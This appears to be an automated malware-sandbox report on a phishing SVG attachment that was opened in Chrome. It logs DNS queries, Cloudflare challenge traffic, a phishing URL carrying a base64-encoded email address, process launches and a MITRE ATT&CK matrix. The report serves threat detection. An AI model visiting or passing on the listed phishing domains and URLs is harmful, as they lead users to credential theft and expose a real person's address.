    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91ee181ead84c325/1741728016090/AsWFfXZs9BwJng8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1328512358:1741724051:vf1wI2YD3_-ZdiO3ZmTkutZy2y0blo3rBlvEFk-0m3g/91ee181ead84c325/Xw32iByo_ezluBxHyRXc0QK7bjck2tPSI_mAE8VhREk-1741728010-1.1.1.1-w6NOyNk8aX1JiR9HaL66PXzHjq7iF8zqVbJjWUwREc2bLYIYz1C9DYWTNGibcoJd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1328512358:1741724051:vf1wI2YD3_-ZdiO3ZmTkutZy2y0blo3rBlvEFk-0m3g/91ee181ead84c325/Xw32iByo_ezluBxHyRXc0QK7bjck2tPSI_mAE8VhREk-1741728010-1.1.1.1-w6NOyNk8aX1JiR9HaL66PXzHjq7iF8zqVbJjWUwREc2bLYIYz1C9DYWTNGibcoJd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: r10.i.lencr.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: coxmotec.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: 0672b651.aa3c3a2ebc7f7237a9b28de7.workers.dev
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: filsinsadoscan.one
    Source: global trafficDNS traffic detected: DNS query: r10.i.lencr.org
    Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1075193866:1741724010:kuXYnhnAAlMhdzcb7_7tQu4pX_CF0pQtqSA0WUvAonE/91ee16efd9062312/zWD85ZnN2ecjeqSqewopDBTFcr5UksGAau3F96XuUxQ-1741727961-1.1.1.1-30oOVfYIhBtWXgMHzJ0eUotjeAszGWH49zvp6iX0C22eBFI7NWAZhToyvfuRF1I0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3546sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: zWD85ZnN2ecjeqSqewopDBTFcr5UksGAau3F96XuUxQ-1741727961-1.1.1.1-30oOVfYIhBtWXgMHzJ0eUotjeAszGWH49zvp6iX0C22eBFI7NWAZhToyvfuRF1I0cf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/6t21i/0x4AAAAAAA_b7xHsf-15SSte/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: SecureMessageatt.svgString found in binary or memory: https://coxmotec.com/wp-includes/js/emFjaGFyeS5hZGtpbnNAcnJjLnRleGFzLmdvdg==
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownHTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7788_1833153780Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir7788_1833153780Jump to behavior
    Source: classification engineClassification label: mal60.phis.winSVG@25/18@20/11
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Packages\cr.sb.odm3E4D1A088C1F6D498C84F3C86DE73CE49F82A104Jump to behavior
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\SecureMessageatt.svg"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,17368269902574151538,11146728938556299558,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1856 /prefetch:3
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=2012,i,17368269902574151538,11146728938556299558,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=6032 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,17368269902574151538,11146728938556299558,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1856 /prefetch:3Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=2012,i,17368269902574151538,11146728938556299558,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=6032 /prefetch:8Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Browser Extensions    		1
    Process Injection    		11
    Masquerading    		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection    		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    File Deletion    		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
    Ingress Tool Transfer    		Traffic DuplicationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.